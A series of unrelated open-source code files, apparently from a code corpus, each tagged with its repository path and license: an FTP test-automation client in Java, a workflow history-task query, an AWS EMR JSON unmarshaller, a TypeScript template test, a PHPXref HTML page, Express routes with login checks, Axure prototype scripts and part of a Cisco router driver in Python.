* the local machine).<br>
*
* @param filesPath - String Array (String...) of full file path.<br>
* @throws Exception
*/
public void copyAllFilesFromRemoteMachineToLocalMachine(String... filesPath) throws Exception{
copyAllFilesViaFTP("mput ", filesPath);
}
private void copyFileViaFTP(String command) throws Exception {
openFTPSession();
setAsciiMode(isAscii());
setPromptMode(isPromptOn());
runCliCommand(command);
}
private void copyAllFilesViaFTP(String command, String... filesPath) throws Exception {
StringBuffer stringBuffer = new StringBuffer(command);
openFTPSession();
setAsciiMode(isAscii());
setPromptMode(isPromptOn());
for(String currentFilePath : filesPath){
String source = adjustPath(currentFilePath);
stringBuffer.append(source);
stringBuffer.append(" ");
}
runCliCommand(stringBuffer.toString());
}
private void runCliCommand(String command) throws Exception{
cli.command(command , 1000 *60 * 5,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("226") < 0){
throw new Exception("Failed in files transfer");
}
}
/**
* Changes ftp session mode to passive
*/
public void passivate(boolean isPassive) throws Exception {
openFTPSession();
for (int i = 0; i < 2;i++){
cli.command("passive",1000*60,true,false,null,ftpGeneralPrompts);
String result = cli.getResult().toLowerCase();
boolean on = result.indexOf("on") >= 0;
boolean off = result.indexOf("off")>= 0;
boolean notSupported = result.indexOf("invalid")>= 0;
if (notSupported){
throw new Exception("Passivation not supported");
}
if ((isPassive && on) ||(!isPassive && off) ){
break;
}
}
}
/**
* Terminates FTPRemoteClient.
*/
public void close() {
closeFTPSession();
super.close();
}
/**
* Opens FTP session
*/
private void openFTPSession() throws Exception {
initCli();
ftpLogin();
}
/**
*/
private void initCli() throws Exception {
if (cli == null){
if (cliConnection != null){
initCliFromCliConnectionImpl();
return;
}
Prompt p = new Prompt();
p.setPrompt(">");
p.setCommandEnd(true);
cli =
CliFactory.createCli(getHost(),getOperatingSystem(), getProtocol(),getUser(),getPassword(),new Prompt[]{p});
}
}
private void initCliFromCliConnectionImpl() throws Exception{
if (!cliConnection.isConnected()){
cliConnection.connect();
}
cli = (Cli)ReflectionUtils.getField("cli", CliConnectionImpl.class).get(cliConnection);
}
/**
*/
private void closeFtp(){
try {
cli.command("bye", 1000 *2 ,true,false,null,new Prompt[]{new Prompt("bye.",true)});
if (cli.getResult().indexOf("221") < 0){
report.report("Did not find success code 221");
}
}catch (Exception e){
report.report("Could not find prompt after closing session. " + e.getMessage());
}
}
/**
*/
private void closeCli(){
if (cli != null){
try {
if (cliConnection != null){
closeCliConnectionImpl();
}
cli.close();
}catch (Exception e){
report.report("Failed closing telnet connection",e);
}
}
cli=null;
}
private void closeCliConnectionImpl() throws Exception{
if (cliConnection.isConnected()){
cliConnection.disconnect();
}
}
/**
* Starts FTP client and performs login.
*/
private void ftpLogin() throws Exception{
cli.command("");
String result = cli.getResult();
for (String ftpPrompt:promptsToStringArray(ftpGeneralPrompts)){
if (result.indexOf(ftpPrompt) >=0 ){
//we are already logged in
return;
}
}
String serverAddress = getFTPServerAddress();
cli.command("ftp " + serverAddress, 1000*60,true,false,null,ftpLoginPrompts);
if (cli.getResult().indexOf("220") < 0){
throw new Exception("Failed connecting to FTP server.("+serverAddress+"). Please verify that there is a ping between the remote client to the runner machine");
}
cli.command(getFtpUserName(),1000*60,true,false,null,ftpPasswordPrompts);
if (cli.getResult().indexOf("331") < 0){
throw new Exception("Failed in login process");
}
cli.command(getFtpPassword(),1000*60,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("230") < 0){
throw new Exception("User not authorized to login");
}
}
/**
* Changes ftp session mode (ascii/binary)
*/
private void setAsciiMode(boolean isAscii) throws Exception {
String command = "binary";
if (isAscii){
command="ascii";
}
cli.command(command,1000*60,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("200") < 0){
throw new Exception("Failed changing to binary mode");
}
}
/**
* Changes the FTP session mode ( on / off )
* @param promptOn
* @throws Exception
*/
private void setPromptMode(boolean promptOn) throws Exception{
String command = "prompt off";
if (promptOn){
command="prompt on";
}
cli.command(command,1000*60,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("Interactive") < 0){
throw new Exception("Failed changing prompt mode");
}
}
public boolean isPromptOn() {
return promptOn;
}
public void setPromptOn(boolean promptOn) {
this.promptOn = promptOn;
}
/**
* Adjusts file path to operating system.
*/
private String adjustPath(String path) {
if (CliFactory.OPERATING_SYSTEM_WINDOWS.equals(getOperatingSystem())){
String toReturn = FileUtils.convertToWindowsPath(path);
if (!toReturn.startsWith("\"")){
toReturn = "\""+toReturn+"\"";
}
return toReturn;
}else {
return FileUtils.replaceSeparator(path);
}
}
/**
*
*/
private void initPrompts() throws Exception {
String[] defaultFTPPrompts = new String[]{"ftp>"};
String[] defaultLoginPrompts = new String[]{"):"};
String[] defaultPasswordPrompts = new String[]{"for "+getFtpUserName(),"Password:"};
if (!new File(FILE_TRANSFER_PROPERTIES_FILE_NAME).exists()){
ftpGeneralPrompts = stringArrayToPrompts(defaultFTPPrompts);
ftpLoginPrompts = stringArrayToPrompts(defaultLoginPrompts);
ftpPasswordPrompts = stringArrayToPrompts(defaultPasswordPrompts);
return;
}
Properties props = new Properties();
FileInputStream stream = new FileInputStream(FILE_TRANSFER_PROPERTIES_FILE_NAME);
try {
props.load(stream);
}finally{
try{stream.close();}catch(Exception e){};
}
String ftpPrompts = props.getProperty(FTP_PROMPTS);
String[] ftpPromptsAsStringArray = StringUtils.split(ftpPrompts, ";, ");
ftpPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPromptsAsStringArray,defaultFTPPrompts});
ftpGeneralPrompts = stringArrayToPrompts(ftpPromptsAsStringArray);
String _ftpLoginPrompts = props.getProperty(FTP_LOGIN_PROMPTS);
String[] ftpLoginPromptsAsStringArray = StringUtils.split(_ftpLoginPrompts, ";, ");
ftpLoginPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpLoginPromptsAsStringArray,defaultLoginPrompts});
ftpLoginPrompts = stringArrayToPrompts(ftpLoginPromptsAsStringArray);
String _ftpPasswordPrompts = props.getProperty(FTP_PASSWORD_PROMPTS);
String[] ftpPasswordPromptsAsStringArray = StringUtils.split(_ftpPasswordPrompts, ";, ");
ftpPasswordPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPasswordPromptsAsStringArray,defaultPasswordPrompts});
ftpPasswordPrompts = stringArrayToPrompts(ftpPasswordPromptsAsStringArray);
}
private String[] promptsToStringArray(Prompt[] prompts){
if (prompts == null){
return new String[0];
}
String[] res = new String[prompts.length];
int i=0;
for (Prompt p:prompts){
res[i]=p.getPrompt();
i++;
}
return res;
}
private Prompt[] stringArrayToPrompts(String[] promptsAsString){
if (promptsAsString == null){
return new Prompt[0];
}
Prompt[] res = new Prompt[promptsAsString.length];
int i=0;
for (String s:promptsAsString){
res[i]=new Prompt(s,false);
res[i].setCommandEnd(true);
i++;
}
return res;
}
private String getFTPServerAddress(){
if (!StringUtils.isEmpty(getFtpServerHostName())){
return getFtpServerHostName();
}
if (!StringUtils.isEmpty(JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY))){
return JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY);
}
return localMachine.getHostName();
}
/**********************************************************************
* FTPRemoteClient setters and getters
*********************************************************************/
public String getHost() {
return host;
}
public String getOperatingSystem() {
return operatingSystem;
}
public void setOperatingSystem(String operatingSystem) {
this.operatingSystem = operatingSystem;
}
public String getProtocol() {
return protocol;
}
public void setProtocol(String protocol) {
this.protocol = protocol;
}
public void setHost(String remoteHost) {
this.host = remoteHost;
}
public String getPassword() {
return password;
}
public void setPassword(String telnetPassword) {
this.password = telnetPassword;
}
public int getPort() {
return port;
}
public void setPort(int telnetPort) {
this.port = telnetPort;
}
public String getUser() {
return user;
}
public void setUser(String telnetUser) {
this.user = telnetUser;
}
public String getFtpServerHostName() {
return ftpServerHostName;
}
public void setFtpServerHostName(String ftpServerHostName) {
this.ftpServerHostName = ftpServerHostName;
}
public String getFtpUserName() {
return ftpUserName;
}
public void setFtpUserName(String ftpUserName) {
this.ftpUserName = ftpUserName;
}
public String getFtpPassword() {
return ftpPassword;
}
public void setFtpPassword(String ftpPassword) {
this.ftpPassword = ftpPassword;
}
public boolean isAscii() {
return ascii;
}
public void setAscii(boolean ascii) {
this.ascii = ascii;
}
}
| Top-Q/jsystem | jsystem-core-system-objects/FileTransfer-so/src/main/java/com/aqua/filetransfer/ftp/FTPRemoteClient.java | Java | apache-2.0 | 17,775 |
/*******************************************************************************
* Copyright 2017 Bstek
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
******************************************************************************/
package com.bstek.uflo.command.impl;
import java.util.List;
import org.hibernate.criterion.Order;
import org.hibernate.criterion.Restrictions;
import com.bstek.uflo.command.Command;
import com.bstek.uflo.env.Context;
import com.bstek.uflo.model.HistoryTask;
/**
* @author Jacky.gao
* @since 2013年9月12日
*/
public class GetListHistoryTasksCommand implements Command<List<HistoryTask>> {
private long processInstanceId;
public GetListHistoryTasksCommand(long processInstanceId) {
this.processInstanceId = processInstanceId;
}
@SuppressWarnings("unchecked")
public List<HistoryTask> execute(Context context) {
return context.getSession().createCriteria(HistoryTask.class)
.add(Restrictions.eq("processInstanceId", processInstanceId))
.addOrder(Order.desc("endDate")).list();
}
}
| youseries/uflo | uflo-core/src/main/java/com/bstek/uflo/command/impl/GetListHistoryTasksCommand.java | Java | apache-2.0 | 1,555 |
/*
* Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.elasticmapreduce.model.transform;
import java.math.*;
import javax.annotation.Generated;
import com.amazonaws.services.elasticmapreduce.model.*;
import com.amazonaws.transform.SimpleTypeJsonUnmarshallers.*;
import com.amazonaws.transform.*;
import com.fasterxml.jackson.core.JsonToken;
import static com.fasterxml.jackson.core.JsonToken.*;
/**
* DescribeClusterResult JSON Unmarshaller
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class DescribeClusterResultJsonUnmarshaller implements Unmarshaller<DescribeClusterResult, JsonUnmarshallerContext> {
public DescribeClusterResult unmarshall(JsonUnmarshallerContext context) throws Exception {
DescribeClusterResult describeClusterResult = new DescribeClusterResult();
int originalDepth = context.getCurrentDepth();
String currentParentElement = context.getCurrentParentElement();
int targetDepth = originalDepth + 1;
JsonToken token = context.getCurrentToken();
if (token == null)
token = context.nextToken();
if (token == VALUE_NULL) {
return describeClusterResult;
}
while (true) {
if (token == null)
break;
if (token == FIELD_NAME || token == START_OBJECT) {
if (context.testExpression("Cluster", targetDepth)) {
context.nextToken();
describeClusterResult.setCluster(ClusterJsonUnmarshaller.getInstance().unmarshall(context));
}
} else if (token == END_ARRAY || token == END_OBJECT) {
if (context.getLastParsedParentElement() == null || context.getLastParsedParentElement().equals(currentParentElement)) {
if (context.getCurrentDepth() <= originalDepth)
break;
}
}
token = context.nextToken();
}
return describeClusterResult;
}
private static DescribeClusterResultJsonUnmarshaller instance;
public static DescribeClusterResultJsonUnmarshaller getInstance() {
if (instance == null)
instance = new DescribeClusterResultJsonUnmarshaller();
return instance;
}
}
| dagnir/aws-sdk-java | aws-java-sdk-emr/src/main/java/com/amazonaws/services/elasticmapreduce/model/transform/DescribeClusterResultJsonUnmarshaller.java | Java | apache-2.0 | 2,841 |
// @target: ES6
var x = 1 % `abc${ 1 }def`; | freedot/tstolua | tests/cases/conformance/es6/templates/templateStringInModuloES6.ts | TypeScript | apache-2.0 | 46 |
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Class Reference: testofauthenticator</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Thu Oct 23 18:57:41 2014 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - [email protected] -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_classes';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logClass('testofauthenticator');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Class Cross Reference</h3>
<h2><a href="index.html#testofauthenticator">testofauthenticator</a></h2>
<b>Defined at:</b><ul>
<li><a href="../tests/simpletest/test/authentication_test.php.html#testofauthenticator">/tests/simpletest/test/authentication_test.php</a> -> <a onClick="logClass('testofauthenticator', '/tests/simpletest/test/authentication_test.php.source.html#l89')" href="../tests/simpletest/test/authentication_test.php.source.html#l89"> line 89</a></li>
</ul>
<br><b>No references found.</b><br><br>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Thu Oct 23 18:57:41 2014</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
| inputx/code-ref-doc | bonfire/_classes/testofauthenticator.html | HTML | apache-2.0 | 4,769 |
/**
* App routes.
*/
var homepage = require('./homepage');
var user = require('./user');
var news = require('./news');
var test = require('./test');
var passport = require('passport');
function ensureAuthenticated(req, res, next) {
if (req.isAuthenticated()) { return next(); }
req.flash('error', '抱歉,您尚未登录。');
return res.redirect('/user/signin?redirect=' + req.path);
}
function ensureAdmin(req, res, next) {
if (req.isAuthenticated() && req.user.isadmin) { return next(); }
req.flash('error', '抱歉,您不是管理员。');
return res.redirect('/user/signin?redirect=' + req.path);
}
function ensurePermission(req, res, next) {
if (req.isAuthenticated() && req.user.isadmin)
{ return next(); }
if (req.isAuthenticated() &&
req.user.username == req.params.id)
{ return next(); }
req.flash('error', '抱歉,您没有权限。');
return res.redirect('/user/signin?redirect=' + req.path);
}
module.exports = function(app) {
app.get('/', homepage.index);
app.get('/user', ensureAdmin, user.showList);
app.get('/user/page/:page(\\d+)', ensureAdmin, user.showList);
app.get('/user/register', user.showRegister);
app.post('/user/register', user.doRegister);
app.get('/user/signin', user.showSignin);
app.post('/user/signin', passport.authenticate('local',
{ successRedirect: '/',
successFlash: '登录成功,欢迎回来。',
failureRedirect: 'back',
failureFlash: '抱歉,手机号或密码错误。',
}));
app.get('/user/signout', user.doSignout);
app.get('/user/:id(\\d{8,13})/edit', ensurePermission, user.showEditUser);
app.post('/user/:id(\\d{8,13})/edit', ensurePermission, user.doEditUser);
app.get('/user/:id(\\d{8,13})/setadmin', ensureAdmin, user.setAdmin);
app.get('/news', news.showList);
app.get('/news/page/:page(\\d+)', news.showList);
app.get('/news/:id(\\d+)', news.showItem);
app.get('/news/:id(\\d+)/edit', ensureAdmin, news.showEditItem);
app.post('/news/:id(\\d+)/edit', ensureAdmin, news.doEditItem);
app.get('/news/:id(\\d+)/delete', ensureAdmin, news.doDeleteItem);
app.get('/news/post', ensureAdmin, news.showNewItem);
app.post('/news/post', ensureAdmin, news.doNewItem);
app.get('/test', test);
app.get('*', function(req, res){
return res.render('homepage', {title: '404'});
});
}
| dotkrnl/helium | routes/index.js | JavaScript | apache-2.0 | 2,456 |
jQuery("#simulation")
.on("click", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .click", function(event, data) {
var jEvent, jFirer, cases;
if(data === undefined) { data = event; }
jEvent = jimEvent(event);
jFirer = jEvent.getEventFirer();
if(jFirer.is("#s-Label_58")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": {
"attributes": {
"color": "#80B8F1",
"text-align": "left",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": {
"attributes": {
"font-size": "20.0pt",
"font-family": "IOS8-Icons-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": {
"attributes": {
"color": "#80B8F1",
"text-align": "left",
"text-decoration": "none",
"font-family": "IOS8-Icons-Regular,Arial",
"font-size": "20.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimPause",
"parameter": {
"pause": 300
},
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": {
"attributes": {
"color": "#007DFF",
"text-align": "left",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": {
"attributes": {
"font-size": "20.0pt",
"font-family": "IOS8-Icons-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": {
"attributes": {
"color": "#157EFB",
"text-align": "left",
"text-decoration": "none",
"font-family": "IOS8-Icons-Regular,Arial",
"font-size": "20.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-cover")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes": {
"opacity": "0.75"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)",
"filter": "alpha(opacity=75)"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie8lte": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)",
"filter": "alpha(opacity=75)"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimPause",
"parameter": {
"pause": 300
},
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes": {
"opacity": "1.0"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)",
"filter": "alpha(opacity=100)"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie8lte": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)",
"filter": "alpha(opacity=100)"
}
}
} ],
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-Hotspot_1")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimNavigation",
"parameter": {
"target": "screens/6709a53d-60b3-4498-bf73-977706fff4da"
},
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-Hotspot_3")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimNavigation",
"parameter": {
"target": "screens/27852e19-fc20-4cac-8d96-13d00ac70f75"
},
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-Button_1")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "center"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": {
"attributes": {
"color": "#80B8F1",
"text-align": "center",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimPause",
"parameter": {
"pause": 300
},
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "center"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": {
"attributes": {
"color": "#007DFF",
"text-align": "center",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
}
})
.on("pageload", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .pageload", function(event, data) {
var jEvent, jFirer, cases;
if(data === undefined) { data = event; }
jEvent = jimEvent(event);
jFirer = jEvent.getEventFirer();
if(jFirer.is("#s-Label_35")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimSetValue",
"parameter": {
"target": "#s-Label_35",
"value": {
"action": "jimConcat",
"parameter": [ {
"action": "jimSubstring",
"parameter": [ {
"action": "jimSystemTime"
},"0","5" ]
}," PM" ]
}
},
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
}
}); | yicold/axure-case | caiqu/财趣v1.5/resources/screens/cd8b0318-8942-4a64-b2c9-ee7c253d6b7d-1445822636718.js | JavaScript | apache-2.0 | 13,587 |
# Copyright 2015 Cisco Systems, Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from sqlalchemy.orm import exc
from sqlalchemy.sql import expression as expr
from neutron.db import models_v2
from neutron.extensions import l3
from neutron_lib import constants as l3_constants
from neutron_lib import exceptions as n_exc
from networking_cisco._i18n import _, _LW
from networking_cisco import backwards_compatibility as bc
from networking_cisco.plugins.cisco.common import cisco_constants
from networking_cisco.plugins.cisco.db.l3 import ha_db
from networking_cisco.plugins.cisco.db.l3 import l3_models
from networking_cisco.plugins.cisco.db.l3.l3_router_appliance_db import (
L3RouterApplianceDBMixin)
from networking_cisco.plugins.cisco.extensions import routerhostingdevice
from networking_cisco.plugins.cisco.extensions import routerrole
from networking_cisco.plugins.cisco.extensions import routertype
from networking_cisco.plugins.cisco.extensions import routertypeawarescheduler
from networking_cisco.plugins.cisco.l3 import drivers
LOG = logging.getLogger(__name__)
DEVICE_OWNER_GLOBAL_ROUTER_GW = cisco_constants.DEVICE_OWNER_GLOBAL_ROUTER_GW
HOSTING_DEVICE_ATTR = routerhostingdevice.HOSTING_DEVICE_ATTR
ROUTER_ROLE_GLOBAL = cisco_constants.ROUTER_ROLE_GLOBAL
ROUTER_ROLE_LOGICAL_GLOBAL = cisco_constants.ROUTER_ROLE_LOGICAL_GLOBAL
ROUTER_ROLE_HA_REDUNDANCY = cisco_constants.ROUTER_ROLE_HA_REDUNDANCY
TENANT_HSRP_GRP_RANGE = 1
TENANT_HSRP_GRP_OFFSET = 1064
EXT_HSRP_GRP_RANGE = 1
EXT_HSRP_GRP_OFFSET = 1064
N_ROUTER_PREFIX = 'nrouter-'
DEV_NAME_LEN = 14
class TopologyNotSupportedByRouterError(n_exc.Conflict):
message = _("Requested topology cannot be supported by router.")
class ASR1kL3RouterDriver(drivers.L3RouterBaseDriver):
def create_router_precommit(self, context, router_context):
pass
def create_router_postcommit(self, context, router_context):
pass
def update_router_precommit(self, context, router_context):
pass
def update_router_postcommit(self, context, router_context):
# Whenever a gateway is added to, or removed from, a router hosted on
# a hosting device, we must ensure that a global router is running
# (for add operation) or not running (for remove operation) on that
# hosting device.
current = router_context.current
if current[HOSTING_DEVICE_ATTR] is None:
return
e_context = context.elevated()
if current['gw_port_id']:
self._conditionally_add_global_router(e_context, current)
else:
self._conditionally_remove_global_router(
e_context, router_context.original, True)
def delete_router_precommit(self, context, router_context):
pass
def delete_router_postcommit(self, context, router_context):
pass
def schedule_router_precommit(self, context, router_context):
pass
def schedule_router_postcommit(self, context, router_context):
# When the hosting device hosts a Neutron router with external
# connectivity, a "global" router (modeled as a Neutron router) must
# also run on the hosting device (outside of any VRF) to enable the
# connectivity.
current = router_context.current
if current['gw_port_id'] and current[HOSTING_DEVICE_ATTR] is not None:
self._conditionally_add_global_router(context.elevated(), current)
